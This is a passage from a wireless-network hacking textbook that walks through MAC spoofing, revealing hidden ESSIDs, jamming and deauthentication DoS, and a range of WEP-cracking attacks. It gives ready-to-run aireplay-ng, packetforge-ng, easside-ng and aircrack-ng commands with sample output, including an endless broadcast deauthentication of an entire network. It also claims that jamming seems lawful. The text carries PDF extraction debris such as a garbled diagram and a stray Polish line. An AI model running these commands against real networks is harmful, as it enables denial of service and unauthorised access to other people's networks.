the value, the stronger the signal)
Rate: the maximum achievable speed of data transfer in

the station
Lost: number of packets lost over the last 10 seconds
Packets: number of data packets sent by the client
Probes: the network name the client is trying to connect to
The AP list section is followed by a client list. The sniffer can

only detect those clients that were logged in when it was running.
Jot down the MAC address in the Station column (choose a client
with a BSSID corresponding to a particular network) and wait for
the user to log out. If you were to connect at the same time, this
would cause the network to act up (for the two users, since with two
devices on the network having the same hardware address, data
transmission becomes complicated). While this activity could draw
the attention of a scrupulous network administrator, it is habitually
blamed on the ‘flaky’ nature of an access point by users, and
administrators often believe the issue lies in client misconfiguration.
Disabling ESSID broadcast

You know now how to negate the security of MAC filtering, but what
about ESSID hiding? Like in the listing above, at times you can find
the following information in place of a network name:
00:19:5B:B3:##:## 206 74 12 0 6 54. OPN <length: 0>
This a result of ESSID broadcasting being disabled on an AP. Until

you obtain a network name, you will not be able to connect to the
network. There are two options in this case.
The first is to wait for a user to log in (the network name is sent
in clear text at logons). The other, much more efficient solution
requires a would-be intruder to disconnect a user, for example using
aireplay-ng from the aircrack-ng toolkit. The tool allows you to
run certain types of attack on WLANs. Type this command in the
terminal in order to deauthenticate a client:
# aireplay-ng -0 1 -a00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 wlan1
The parameters:
aireplay-ng: the tool that deauthenticates a user
-0: the attack number (attack 0 is deauthentication)
1: the number of deauthentication packets to be sent; may be

multiplied; if set to 0, the program will continue deauthenticating
until it is closed (for example by ^C – ctrl + c)
-a 00:14:6C:7E:40:80: the MAC address of the AP
-c 00:0F:B5:34:30:30: the MAC address of the client to be

deauthenticated; if this option is skipped, all stations on the
network are deauthenticated
Disabling ESSID broadcast 37
This attack mode works not only with open networks (that use
no authentication and encryption). Why is that? The pivotal item
in the attack was ‘telling’ your target it has been disconnected.
Aireplay generates a deauthentication packet and ‘signs’ it with the
MAC address of the access point. No encryption is applied at the
level at which these commands run, so you do not need a key to
communicate. The levels are referred to as layers and were defined
as early as 1983. The 7-layer model has been developed by the
International Organization for Standardization (ISO). Information
is passed starting at the application layer in one station proceeding
hierarchically from one layer to another layer (implemented by
protocols). The following is an example of opening a web page
on a wireless network: http → tcp → ip → 802.11 → cable →
ADSL → Ethernet → ip → tcp → http. Layers have been introduced as
a means of facilitating the communication between different devices
and systems via protocols that might be developed by different
vendors.
Server ‘A’ Server ‘B’
Application Application
Presentation Presentation
Session Session
Transport Transport
Network Network
Data Link Data Link

Communications
medium
Physical Physical
Figure 3: Layers in the OSI model
Limiting wireless coverage

Reducing signal leakage outside the house is vital for secure wireless
networking but unfortunately often overlooked or ignored by
network administrators. Placed next to doors and windows, special
appliances can generate interference and disrupt your wireless
signal, improving safety. It is up to you to do the math: is top-shelf,
longest-range gear really secure for you?
3
Chapter 3
Wireless network attacks

independent of used
encryption
Chapter outline:
1. Introduction
2. DoS: RF jamming
3. DoS: CSMA/CA jamming
4. DoS: Deauthentication attack
5. Wireless MITM
Introduction
Even a well-protected network that uses an encryption model
you are incapable of cracking is still not fully resistant to some
types of attacks. No wireless network has been and probably will
never be completely immune to DoS (Denial-of-Service) attacks,
and no precautions can protect you from a would-be attacker
equipped with an outsized antenna pointed in the direction
40 Chapter 3 – Wireless network attacks independent of used encryption
of your AP. An example attack could involve a simple loop:

while(true) send _ packet _ to _ AP();. An AP responds to all
packets it receives, irrespective of the sender. If your antenna’s signal
is powerful enough and can shoot out packets quickly, the AP will
fail to keep up with the traffic flow and transmit to other users.
This attack could simply slow down data transmission or cause
a communications breakdown, or even physically damage the AP.
DoS: RF jamming 41
DoS: RF jamming
The Denial-of-Service (DoS) attack works by disrupting a targeted
service and preventing it from carrying out its tasks (if the victim is
an access point, it will not be able to receive and send traffic to other
networking devices). The victim becomes overloaded as a result.
DoS attacks require a powerful machine that can generate requests
faster than the victim can respond to them: not plain sailing any
means.
RF jamming is a type of a DoS attack. Jamming is the deliberate

act of interfering with a wireless signal, while RF stands for Radio
Frequency. As you can gather, the crux of this tactic is making use
of radio frequencies to disrupt a signal. Any high-power transmitter
operating in the frequency range used by another wireless network
may be able to disrupt it.
As mentioned, using the air as a transmission medium is unusual

in that you cannot reserve the right to a part of it. The medium is
shared and open to everyone. As a consequence, virtually anyone
can broadcast information into the air should they like to, and
while regulatory bodies seek to monitor and oversee the use of radio
bands, one-off incidents are hard to detect.
Channels have been already discussed. They have been introduced

as a way to avoid the potential interference resulting from the
operation of multiple overlapping networks. If several devices
use the same frequency range, their signals overlap, causing
interference. The stronger device (emitting a more powerful signal)
overpowers the weaker one and is able to transmit messages.
All a perpetrator needs to do to interrupt networking or make
a wireless network crash is to use a piece of equipment that can
generate a high-intensity signal broadcast on frequencies close to the
frequencies used by the wireless network. Under some conditions,
a simple microwave oven can fit the bill (even though the metal case
and wire-meshed window dramatically reduce the radiation getting
out). Check for microwaves and similar home appliances to make
sure your WLAN topology is free of interrupters.
DoS: CSMA/CA jamming 43
DoS: CSMA/CA jamming

CSMA/CA, or Carrier Sense Multiple Access with Collision
Avoidance, is a multiple access protocol with carrier sensing
(listening to a shared medium to see if it is transmitting) and
collision avoidance features, and an extension of the CSMA
protocol. CSMA/CA jamming is yet another type of DoS in wireless
networks. As evident from its name, this attack involves weakening
the performance of a network that uses collision avoidance tactics.
An attacker with a wireless card with modified drivers can reliably

disrupt any selected network nearby.
The 802.11 networks use the CSMA/CA collision avoidance

protocol. A station, prior to transmitting a frame, sends an RTS to
see if a collision has occurred. If another station is transmitting at
the same time, it will wait a random backoff time before attempting
to re-transmit.
In this scenario, an attacker modifies his network card drivers

and forces the card to continually send out information without
checking for collisions. As a result, the channel is continuously
sensed as busy while the cards of other users wait for the channel to
be idle again.
What is more, the attack seems to be lawful as WLANs operate in

the unlicensed band everyone has the right to use and broadcast on.
The CSMA/CA jamming attack can result in a complete network
shutdown ongoing until the attacker turns off the rogue transmitter.
DoS: Deauthentication attack

The deauthentication attack is the last of the three types of Denial-
of-Service attacks we cover. In this scenario, a hacker has access
to a tool that generates specially crafted packets and uses it to
disassociate selected clients or all clients on a network.
As per the 802.11 standard, authentication packets are a subtype

of management packets. Only data frames are encrypted in
this standard, and therefore it appears that any malefactor
with or without a wireless key can spoof a legitimate access
point to send out authentication-related frames. One of them is
a deauthentication packet: we have already used it to make a client
station re-authenticate. A similar attack setup, forcing a client
to continuously attempt to authenticate, can be the basis for DoS
attacks. A deauthentication attack can target one client or entire
network. If you want to make it include all clients, simply send
a frame to the broadcast address FF:FF:FF:FF:FF:FF.
An example attack:
# aireplay-ng -0 0 -a00:14:6C:7E:40:80 -c FF:FF:FF:FF:FF:FF wlan1
Opis parametrów:
The parameters:
aireplay-ng: the tool that deauthenticates a user
-0: this switch means deauthentication
0: the number of deauthentication packets to be sent is set to 0,

which means send them infinitely
-a 00:14:6C:7E:40:80 BSSID: the MAC address of the access point

DoS: Deauthentication attack 45
-c FF:FF:FF:FF:FF:FF: the attack target, here it is the broadcast

address, i.e. the entire network

Wireless MITM
The MITM (Man-in-the-Middle) attack occurs when an
intermediary of sorts is inconspicuously placed in line between
a sender and receiver. This intermediary is an attacker. The Man-
in-the-Middle attacker captures packets sent to an AP, modifies
them and forwards them to the AP. The same can be done with
communications transmitted from an AP to a client.
The possession of an access key and network name may be leveraged

to sniff and modify any piece of information exchanged across
WLAN clients.
The wireless key gives WLAN access to anyone who knows it. If
a rogue hacker AP responds faster than the real AP, the malicious
access point will ‘seize’ a client. In the next step, the rogue AP connects
to the rightful access point and sends all information it receives from
its associated client to the original AP. Transparently, all frames sent or
received by a client may be sniffed and changed if desired.
Airbase-ng will be the tool used to run this attack.
The first step is to collect all information necessary to set up a rogue

access point. Airodump-ng will be used for the task.

00:16:41:8E:##:## 177 10 0 0 10 54 WEP WEP #dslprovider##d
Among the captured information is the BSSID, channel,

encryption algorithm, authentication protocol and network
name. To run an example attack, you’ll need a tool called
airbase-ng. Unfortunately, at this time the MITM option is not
implemented yet. Be sure to check for latest project updates at
http://www.aircrack-ng.org/doku.php?id=airbase-ng and run your
own tests when it becomes available.
4
Chapter 4
WEP attacks
Chapter outline:
1. WEP encryption
2. Chopchop
3. Keystream reuse
1. packetforge-ng
1. Fragmentation attack
2. Fake authentication
2. easside-ng
4. FMS, KoreK attacks, PTW
1. Interactive packet replay
2. ARP request attack
5. Caffe Latte Attack
48 Chapter 4 – WEP attacks
WEP encryption
To understand the science behind attacks against WEP, start with
getting the knack of the encryption process used in WEP (Wired
Equivalent Privacy), a system designed to provide as much security
as a wired connection.
A keystream is a pseudorandom string generated by the RC4

stream cipher (the algorithm is also called PRGA, Pseudo-Random
Generation Algorithm). To ensure a message cannot be decrypted, it
should be scrambled and made as unpredictable as possible, almost
random: nevertheless, the information needs to be recovered when
subjected to decryption. Nearly all ciphers modify information so
that it is illegible without a key. Similarly to other algorithms, RC4
needs an input: for WEP, the input is a key and an initialization
vector (IV). The vectors act like seeds, generating their successors.
With the original IV and the key, you can easily generate the next
initialization vectors. The security of the algorithm relies heavily
on the constant change of vector values: if the same vectors were
habitually re-used, plaintexts would be combined (XOR-ed) directly
with an encryption key.
WEP makes use of the RC4 cipher, which takes the key and
initialization vector values to generate a pseudorandom stream
of bits that corresponds in length to the length of a sent packet.
This value is combined with the plaintext to receive a similarly
pseudorandom output ready to be sent. The (24-bit) initialization
vector is a random number in the range from 0 to 224 –1, or from 0 to
16,777,215. The solution ensures that two identical packets produce
a pair of different ciphertexts. Since attackers have to be assumed to
be well-versed in network protocols, they understand that packets
can be discovered based on how often they appear.
WEP encryption 49
For example, DNS queries are more popular than echo request
(pings). This fact enables you to make educated guesses about the
encrypted plaintext and can be exploited to crack a cipher. This
attack mode is known as the known-plaintext attack.
Adding a random value to the text to be encrypted mitigates this

threat, while sending it in clear text means an addressee can read it.
Let’s go into more detail about the ciphertext generation process.
IV
Key
+ RC4 Keystream
Output
Packet
+ XOR
CRC32
Figure 4: The WEP encryption process
Clearly shown in the figure above, an initialization vector (IV) is

concatenated with a key and passed to the RC4 cipher. It is used as
a salt, an item added to an algorithm to randomize the resultant
packet. The cipher generates a keystream that is next combined
with the packet data by XOR-ing. This process, also referred to as
addition modulo 2 or exclusive disjunction, is a reversible bitwise
operation. It is bitwise as it works with data on a bit level, and it is
innately reversible, as outlined below:
XOR 0 1
0 0 1
1 1 0
Figure 5: The XOR function
The first argument is below the bolded XOR, the second is to the
right of it. Since the exclusive disjunction is a bitwise operation,
all arguments have to take either 0 or 1. The four fields that are
isolated from arguments represent the outputs of every possible
combination. As you can see, XOR is true (takes 1) if the inputs are
not alike (0, 1 and 1, 0) and takes 0 in the opposite scenario (0, 0 and
1, 1). XOR-ing can be reversed, which means that if you process an
output with an argument, the result is the missing argument:
AXOR B = B XOR A= C

C XOR B = B XOR C = A
AXOR C = C XOR A= B
Importantly, the WEP encryption process also involves appending

a checksum calculated via the CRC32 algorithm to a message. The
role of this checksum is to provide error- and change-detection for
data in transmitted packets.
WEP encryption 51
Below is another diagram that shows how WEP works:
IP TCP DATA CRC IV KEY
RC4
0101 1100
KEYSTREAM
XOR
100
CIPHERTEXT IV
Figure 6: The WEP encryption

Chopchop
The chopchop attack name derives from the action that occurs in
this technique, that is cutting (chopping off) appropriate bytes from
packets to reveal the plaintext packet, and, consequently, reveal its
keystream in WEP-protected environments.
To understand this and the next attacks in this section, you need to
know how information is encrypted in WEP.
The chopchop attack begins with trying to sniff a message addressed

to a host on a network. If captured, this means its checksum is valid.
The chopchop attacks makes use of an access point and exploits
a CRC32 checksum vulnerability. A linear function is used to
calculate the CRC32 checksum, and as the laws of mathematics
would have it with these functions, CRC32(A+B) = CRC32(A) +
CRC32(B).
Chop off the last byte in a valid frame and calculate the checksum,
assuming the removed plaintext byte is 0. Send the edited message
to an AP. If the AP drops it, this means your A is not correct and you
need to re-calculate CRC32 with a different value for the missing
part. Repeat the procedure until there is a match. When successful,
continue using the method to reveal another value. But doesn’t it
all take too long? Chopchoping and similar attacks make use of
pure mathematics and the birthday paradox phenomenon. How
many people have to be in a group for the probability of at least two
persons sharing their birthday equal at least ½? At a glance, it seems
the answer is 365/2, however once you inspect this thoroughly, the
figure drops to just 23.
Let’s go back to WEP cracking. Because a byte can assume one

of 256 values, the probability of success for your first guess is
1/256. With the second guess, it is 1/256+1/255, with the third it’s
Chopchop 53
1/256+1/255+1/254, etc. As you can easily compute yourself, half of

the times you’ll get lucky by your 100th guess (after checking 40%
of combinations rather than, as it initially seemed, 50%).
DATA A CRC(DATA+A)
DATA CRC(DATA+A) - CRC(A)
Figure 7: The chopchop attack
Let’s say you have a WEP-protected network and want to see the
contents of selected packets or, whatever the reason, cannot use any
other way to capture a keystream needed to generate an ARP packet.
You can then fall back on the chopchop attack implemented in the
aireplay-ng utility included in aircrack-ng.
# aireplay-ng -4 -h 00:09:5B:EC:EE:F2 -b 00:14:6C:7E:40:80 wlan1
The parameters:
-4: identifies the chopchop attack
-h 00:09:5B:EC:EE:F2: the MAC address of the associated client
-b 00:14:6C:7E:40:80: the BSSID, or the MAC address of the

access point
The next step is selecting a packet to be decrypted. You can select

a short frame to end the attack as quickly as possible, or choose
a packet from a specific client that uses a key you want to crack.
Read 165 packets...

Size: 86, FromDS: 1, ToDS: 0 (WEP)
BSSID = 00:14:6C:7E:40:80
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:40:F4:77:E5:C9
0x0000: 0842 0000 ffff ffff ffff 0014 6c7e 4080 .B..........l~@.
0x0010: 0040 f477 e5c9 603a d600 0000 5fed a222 .@.w..`:...._..“
0x0020: e2ee aa48 8312 f59d c8c0 af5f 3dd8 a543 ...H......._=..C
0x0030: d1ca 0c9b 6aeb fad6 f394 2591 5bf4 2873 ....j.....%.[.(s
0x0040: 16d4 43fb aebb 3ea1 7101 729e 65ca 6905 ..C...>.q.r.e.i.
0x0050: cfeb 4a72 be46 ..Jr.F
Use this packet ? Y
If you think this is a suitable packet, type y and press Enter. Soon
you’ll see the results, which will be similar to the sample output
below:
Saving chosen packet in replay_src-0201-191639.cap
Offset 85 ( 0% done) | xor = D3 | pt = 95 | 253 frames written in 760ms

Offset 84 ( 1% done) | xor = EB | pt = 55 | 166 frames written in 498ms
Offset 83 ( 3% done) | xor = 47 | pt = 35 | 215 frames written in 645ms
(...)
Offset 36 (94% done) | xor = 83 | pt = 00 | 19 frames written in 58ms
Offset 35 (96% done) | xor = 4E | pt = 06 | 230 frames written in 689ms
Sent 957 packets, current guess: B9...
The AP appears to drop packets shorter than 35 bytes.

Enabling standard workaround: ARP header re-creation.
Saving plaintext in replay_dec-0201-191706.cap

Saving keystream in replay_dec-0201-191706.xor
Completed in 21s (2.29 bytes/s)
The plaintext packet has been saved to replay_dec-0201-191706.cap,

while its decrypted keystream has been saved to replay_dec-0201-
191706.xor. The captured keystream may be a starting point for
Chopchop 55
another attack that requires it. Note that the attack can be also used
to slowly read transmissions: it is enough to eavesdrop on traffic for
some time and try to decode the packets later.
The keystream can also be used to inject decrypted data into the
network.
Keystream reuse
In this chapter we look at the packetforge-ng and easside-ng
applications. They will be examined in more detail below, but before
you go any further, let’s quickly recap what they can be used for.
The first utility, packetforge-ng, allows you to correctly encrypt

arbitrary packets without knowing the WEP key. This possibility
may be utilized in a number of scenarios (including collecting new
keystreams by sending ARP requests). The other tool, easside-ng,
enables you to both receive and send transmissions in an encrypted
network without requiring the key. While surprising, this is feasible
under certain conditions.
Let’s now take a closer look at these programs and their usage and
launch some example attacks.
Packetforge-ng
The program creates packets and injects them into wireless
networks without knowing the key. A usage example is generating
ARP packets. ARP request packets are neat for cracking the wireless
key with the use of statistical methods that will be outlined later in
the book. To begin, run this command:
# packetforge-ng -0 -a00:14:6C:7E:40:80 -h 00:0F:B5:AB:CB:9D -k 192.168.1.100

-l 192.168.1.1 -y fragment-0124-161129.xor -warp-request
The parameters:
-0: the type of packet you want to generate (ARP)
-a 00:14:6C:7E:40:80: the MAC address of the access point
-k 192.168.1.100: the destination IP address the ARP asks about

Keystream reuse 57
-l 192.168.1.1: the source IP address of the host that sends the

request
-y fragment-0124-161129.xor: the name of the keystream file
-w: the name of the output file containing a packet to send
When successfully executed, the command generates a packet ready

to be injected. Next, you can start generating new initialization
vectors using the ARP replay attack, which will be demonstrated in
the section on statistical attacks.
A keystream file is one of the arguments explained above. The most

efficient method for obtaining it is the fragmentation attack.
Fragmentation attack
Having captured a single data frame, a hacker can generate large
amounts of keystream for a specific initialization vector that can
later be used to send a crafted message.
The basis of the attack is the fragmentation ability included in 802.11

standard and the fact the encrypted part of a frame contains fixed,
unchanging headers.
Let’s go back to the layer model:

Layers
Application
Presentation
Session
Transport
Network LLC sublayer

(Logical Link Control)
Data Link
MAC sublayer
(Media Access Control)
Physical
Figure 8: The OSI layer model
As you can gather from this diagram, as a message is passed

top-down, different protocol headers are added at each layer. Let’s
assume the 802.11 protocol level as our base. It is placed in the Data
Link Layer, a layer that is relatively low in the hierarchy. The layer is
additionally split into two sublayers: the LLC (Logical Link Control)
and MAC (Media Access Control). Encryption takes place at the
MAC sublayer, which means that the LLC header is already passed
in an encrypted form. The LLC header also includes another header
called SNAP (Subnetwork Access Protocol).
Keystream reuse 59
Below is the format of the SNAP header:
ARP (0x806)
0xAA 0xAA 0x03 0x00 0x00 0x00 ??
IP (0x800)
Figure 9: The SNAP header format
SNAP is of particular interest to us since it is placed at the start of

the encrypted part and has almost always fixed contents. While
discussing its format in more detail is superfluous (if you are
interested in learning more, consult the 802.2 standard description,
or LLC), what is vital is that for some reasons the first 6 bytes in
the header are always identical, while the next two-octet fields
that indicate an upper layer protocol type usually take IP or ARP
values. To know which protocol is encapsulated in a captured frame,
remember that ARP packets are fixed in length: they are 36-byte.
We know this information to be useful from the way WEP works
because it does not alter the size of an original packet. You can safely
say that any 36-byte packets are ARP, and all others are IP packets.
Thanks to this deduction, you can obtain the first eight bytes of
a keystream, remembering the keystream can be computed if
you XOR the plaintext and the ciphertext. Now, it’s time to fit in
fragmentation. You can divide a packet into 16 smaller fragments
at the most. A salient point is that each fragment is encrypted
individually as a stand-alone message: it follows that if you use
the same vector (the key is constant) for encryption, the reality is
that you are using the same keystream as well. Since you have
found the first 8 bytes of a keystream, the partitions you send will
be 8-byte. Choose a packet to send: let’s make it an ARP request.
Break it down into 8-byte subpackets and use each to encrypt the
revealed keystream. For an AP to be able to identify and reassemble
the fragments, you need to set the ‘more fragments’ flag. In the
diagram below the flag is marked as MF.
802.11 header Encrypted

MF SRC DST IV SNAP ???
capturing: 0 SRC DST 5a0300 SNAP ???
sending: 1 SRC DST 5a0300 SNAP
1 SRC DST 5a0300 ARP pt.1

(. . .)
known:
receiving: 0 SRC DST 1b9e17 SNAP ARP
sending: 1 SRC DST 1b9e17 SNAP DATA1
1 SRC DST 1b9e17 DATA2

(. . .)
0 SRC DST 1b9e17 DATA16
receiving: 1 SRC DST 5d0300 DATA
Figure 10: The fragmentation attack
When all fragments are transmitted, an AP has the task of

reassembling and sending them into the wireless network.
The forwarded packet needs to be encrypted with a new
initialization vector. Note that after you capture a packet, you
know its plaintext format. We have captured an ARP packet.
Keystream reuse 61
The procedure can be iterated to reveal more of the keystream.

Use the known keystream bits as one fragment and send it out
a number of times. The AP should again reassemble these fragments
into a larger message and encrypt it using a different IV. As you
proceed, you are capable of obtaining up to 1,500 bytes of keystream,
the maximum transmission unit for Ethernet.
To experiment in real environments, you can use aireplay-ng with

this syntax:
# aireplay-ng -5 -b 00:14:6C:7E:40:80 -h 00:0F:B5:AB:CB:9D wlan1
The parameters:
-5: identifies the fragmentation attack
-b 00:14:6C:7E:40:80: the BSSID, or the MAC address of the AP
-h 00:0F:B5:AB:CB:9D: the MAC address of the associated client

used to inject packets
Running this command will make the program wait for a data
packet to capture. When a data packet is found, it displays
information similar to the sample output below:
Waiting for adata packet...

Read 96 packets...
BSSID = 00:14:6C:7E:40:80
Dest. MAC = 00:0F:B5:AB:CB:9D
Source MAC = 00:D0:CF:03:34:8C
0x0000: 0842 0201 000f b5ab cb9d 0014 6c7e 4080 .B..........l~@.
0x0010: 00d0 cf03 348c e0d2 4001 0000 2b62 7a01 ....4...@...+bz.
0x0020: 6d6d b1e0 92a8 039b ca6f cecb 5364 6e16 mm.......o..Sdn.
0x0030: a21d 2a70 49cf eef8 f9b9 279c 9020 30c4 ..*pI.....‘.. 0.
0x0040: 7013 f7f3 5953 1234 5727 146c eeaa a594 p...YS.4W‘.l....
0x0050: fd55 66a2 030f 472d 2682 3957 8429 9ca5 .Uf...G-&.9W.)..
0x0060: 517f 1544 bd82 ad77 fe9a cd99 a43c 52a1 Q .D...w.....<R.
0x0070: 0505 933f af2f 740e ...?./t.
Use this packet ? y
If you think this is a good packet, type y and press Enter.

Data packet found!
Sending fragmented packet
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 384 bytes of akeystream
Trying to get 1500 bytes of akeystream
Saving keystream in fragment-0124-161129.xor
Now you can build apacket with packetforge-ng out of that 1500 bytes keystream
The listing above shows an example of a successful recovery of

a keystream. The keystream is written to the fragment-0124-161129.
xor file.
Keystream reuse 63
Fake authentication
A hacker may do without the wireless network key to successfully
authenticate. In the worst case scenario, with a WEP environment
enabling Shared Key Authentication, the adversary will need
a handful of keystream bytes.
As you know, two authentication modes exist in WEP. In the first,

Open System Authentication, any client access a wireless network.
The other mode uses a shared key, and requires clients to know
the password to connect. If the open mode is enabled in a network,
authentication is a mere formality: all you need to do is send a non-
encrypted management frame requesting to authenticate. An access
point is set to automatically send a positive response and let you
communicate on the network.
Open authentication request
Open authentication success
Figure 11: Open System Authentication
With the Shared Key Authentication feature enabled, the following

process takes place:
Authentication request
Authentication response (Challenge)
Encrypted challenge
Authentication response
Figure 12: Shared Key Authentication

As before, a client sends an authentication request. An AP responds

with sending a challenge text, which is a random string. The client’s
task is to send the challenge back encrypted. The AP decrypts it
with the original key and checks if it matches the challenge text sent
earlier. If correct, the client is successfully connected.
In our scenario, a wireless network grants clients access based

on their knowledge of a shared key. The fake authentication
attack occurs when you use a keystream (collected earlier) to
encrypt a challenge text sent by an AP. You can select any of the
demonstrated techniques to obtain a keystream, or you can simply
sniff an associated client logon process. When you know a logon
process, you know the challenge plaintext sent by an AP, and you
have its encrypted version, too. By XOR-ing the two strings (the
argument and output), the result you get is a keystream. If the key
and IV are not changed, the keystream value will be the same. When
authenticating, simply submit the IV of a previously captured packet
in a response and use the obtained keystream. If some clients are
already authenticated, you can use the familiar deauthentication
method to force a client to re-authenticate.
Easside-ng
An adversary with an Internet connection might be able to
successfully transmit and receive communications in a wireless
network without knowing its key. The requirements are that the
wireless network must have access the Internet and the attacker
must run dedicated software on an external server.
The utility again makes use of fragmentation and a previously

collected keystream (obtained for example in a fragmentation
attack). As you have seen, a sufficiently long keystream enables you
to inject a specially crafted packet that is next relayed by an access
point. There is also a way to receive packets. The attack consists in
Keystream reuse 65
redirecting all incoming and encrypted packets to a server outside

the wireless network and having an AP decrypt the re-directed
messages. The means behind it is a packet consisting of two
fragments. The first fragment contains the IP of a buddy server and
the other includes the original message. You can compose the first
fragment using a known vector and a corresponding keystream
(with the ‘more fragments’ flag set). The other fragment is sent in the
original form without altering the IV. An unsuspecting access point
decrypts both valid packets, combines them and relays to a target
you select. The buddy server now only needs to send the decrypted
messages to the attacker over an unencrypted channel (the Internet
connection). The result of these operations is the capacity to both
inject and receive packets in real time.
This scenario is presented below:

Client Target
AP
IP, data
De
cr
des t and rypt
yp
te
tina add
IP
d
c
pa
a n packe to de
tion
ck
Ca pack
et
pt et
a
the an AP
ur
es
ew
Use
Buddy server
Attacker
Figure 13: Using an AP to decrypt a packet
Let’s now pen-test this idea. Start buddy-ng on a buddy server. If you
want, it can start on the client workstation.
# buddy-ng
The response:
buddy-ng
Waiting for connexion
Run this command on the host that uses a wireless card to access
the target network:
# easside-ng -f wlan1 -v 00:14:6C:7E:40:80 -c 9 -s 10.116.23.144

Keystream reuse 67
Where:
-f wlan1: the wireless network interface name
-v 00:14:6C:7E:40:80: the BSSID, or the MAC address of

the access point
-c 9: the channel your target operates on
-s 10.116.23.144: the IP address of the buddy server
Here’s sample output that results from the above command:
Setting tap MTU

Sorting out wifi MAC
MAC is 00:08:D4:86:7E:98
Setting tap MAC
[14:40:06.596419] Ownin...
SSID teddy Chan 9 Mac 00:14:6C:7E:40:80
Sending auth request
Authenticated
Sending assoc request
Associated: 1
Assuming ARP 54
[14:40:13.537842] Got 22 bytes of PRGA IV [4B:02:00]
[14:40:13.545021] Got 58 bytes of PRGA IV [4C:02:00]
[14:40:13.648670] Got 166 bytes of PRGA IV [4D:02:00]
[14:40:13.753087] Got 490 bytes of PRGA IV [4E:02:00]
[14:40:13.863819] Got 1462 bytes of PRGA IV [4F:02:00]
[14:40:13.966753] Got 1504 bytes of PRGA IV [50:02:00]
Assuming ARP 36
[15:23:42.047332] Guessing prga byte 22 with 16
ARP IP so far: 192
[15:23:42.749330] Guessing prga byte 23 with 3F
ARP IP so far: 192.168
[15:23:43.815329] Guessing prga byte 24 with 60
ARP IP so far: 192.168.1
My IP 192.168.1.123
Rtr IP 192.168.1.1
Sending who has 192.168.1.1 tell 192.168.1.123
Rtr MAC 00:14:6C:7E:40:80
Trying to connect to buddy: 10.116.23.144:6969
Connected
Handshake compl33t
Checking for internet... 1
Internet w0rx. Public IP 10.113.65.187
Rtt 77ms
The console running the server should output a message similar to

the one below (the IP address will obviously be different):
Got connection from 10.113.65.187

Handshake complete
Inet check by 10.113.65.187 1
These steps result in a new interface you can use for Internet
communications:
# ifconfig at0 up
# dhcpcd at0
FMS, KoreK attacks, PTW 69
FMS, KoreK attacks, PTW

An attacker can crack a WEP key with a probability that is
proportional to the number of encrypted packets captured. This
means that a sufficient number of network frames needs to be
collected to see a positive outcome; in other words, listening on
network traffic has to be carried out satisfactorily long.
The FMS, KoreK and PTW attacks use statistical analysis techniques
to crack WEP keys. We aim to offer a general overview of their mode
of operation rather than scrutinize the mathematics they use. If
you would like to learn more, check out the papers provided in the
bibliography section.
FMS is an acronym made up of the initials of the attack’s authors.

The Fluhrer, Mantin and Shamir attack targets RC4 applied in
WEP. To remind you quickly, this cipher requires a 3-byte (24-bit)
initialization vector (IV) concatenated with a key. For some
IV values (weak initialization vectors), you can simulate the
encryption process to reconstruct the key byte by byte with about
a 5% chance of finding the correct byte.
Why byte by byte? Since the IV is sent in the clear, an attacker

collects the first 3 bytes used to encrypt a message. Your task is to
simulate encryption for these three bytes. Due to a RC4 weakness
discovered by Fluhrer, Mantin and Shamir, you might be able (with
about a 50% success rate) to identify the fourth byte (the first in the
user-submitted string). The downside is that to proceed further and
collect the fourth, fifth and consecutive key bytes, you need to be as
certain as possible the bytes you have collected are correct. If they
are not, all the calculations you do fail to reconstruct the true result.
The cracking is grounded in and uses statistical methods to great
effect. The more attacks you launch on byte four (and the more, the
better) using different weak initialization vectors (other IVs will not
be suitable), the more probable it becomes to find the correct byte.

As a byte can take any of the 0–255 values, set up a frequency table
and sort every try under an appropriate number. You could think of
it as an election race with 256 candidates. Every try to crack a weak
IV is like casting a vote. The most voted candidate is the likeliest to
be the correct key byte.
To reduce mistakes, alternative candidates that are over a specific

‘election threshold’ are sorted ‘on the side’. In this context, the
threshold is called the fudge factor. Having obtained (and hoping
it is correct) a fourth key byte, you can start breaking the fifth, sixth
and the remaining bytes in a key by using the same formula. The last
stage after you have completed these steps is to try the key on for size
and attempt to decrypt a packet. If the checksum is correct, you have
a winner. If not, try testing your alternative candidates. One of the
upshots of this attack being published was that manufacturers began
to filter weak initialization vectors in their devices to ensure they are
not used to encrypt messages.
Network data:
password: P A S S W
key: 50 41 53 53 57
FMS attack:
Weak IV 1 0A 80 BE 03 57
Weak IV 2 AF 41 B0 13 75
Weak IV 3 34 71 53 28 57
Weak IV 4 50 00 53 53 94
... Bit: 50 41 53 53 57
Weak IV 1000 50 41 28 42 68 Votes: 17 23 19 27 16
Figure 14: The FMS attack

KoreK attacks rely on a number of other statistical key dependencies,

and this is not the right space to discuss their differences and
complexity. Again, should you want to learn more, see the positions
listed in the bibliography. Let’s just say these attacks do not exploit
weak IVs, so skipping them does not do much to mitigate the risk.
Aircrack-ng uses both the FMS and KoreK attacks to collect votes for
likely key bytes.
The PTW attack is based on Andreas Klein’s RC4 analysis, which

reveals even more correlations between keystream and key. All
the attack modes outlined above share a similar key cracking
mechanism, with some alterations in the mathematics they use
(which will not be discussed). For the user, the aspect that matters
most is the number of packets to collect and attack speed. The FMS
attack takes from 4,000,000 to 6,000,000 packets to break WEP.
The enhanced KoreK needs just 500,000 to 2,000,000 packets.
With PTW meanwhile the capture of 40,000 packets gives you
approximately a 50% probability of finding the key, and if you
have 85,000 packets, it goes up to 95%. The PTW attack speed
averages 3 seconds when using a Pentium 4 1.7 GHz CPU: a striking
evidence of WEP’s weakness. Packet rate, depending on a network’s
performance, might equal 6,000 packets per minute.
For an implementation of these attacks, use aircrack-ng. Run this

command to start FMS:
# airodump-ng -c 9 -wpackets wlan1
The parameters:
-c 9: selects a specific channel to listen on so that no data frames

are missed
-w packets: the prefix of the file name to which packets are

written
# aircrack-ng -K packets-01.cap
The parameters:
-K: selects the KoreK/FMS modes
packets-01.cap: the name of the file containing encrypted

packets
Opening packets-10.cap
Read 877949 packets.
# BSSID ESSID Encryption
1 00:15:E9:E4:63:05 Di None (0.0.0.0)

2 00:1A:70:A2:66:B4 linksys WEP (830478 IVs)
3 00:1E:E5:8D:53:EC .. No data - WEP or WPA
Index number of target network ? 2
Submit the number of your target network. In this example, it is the

second network in the list.
Opening packets-10.cap
Reading packets, please wait...
Aircrack-ng 1.0
[00:00:05] Tested 139 keys (got 845278 IVs)
KB depth byte(vote)
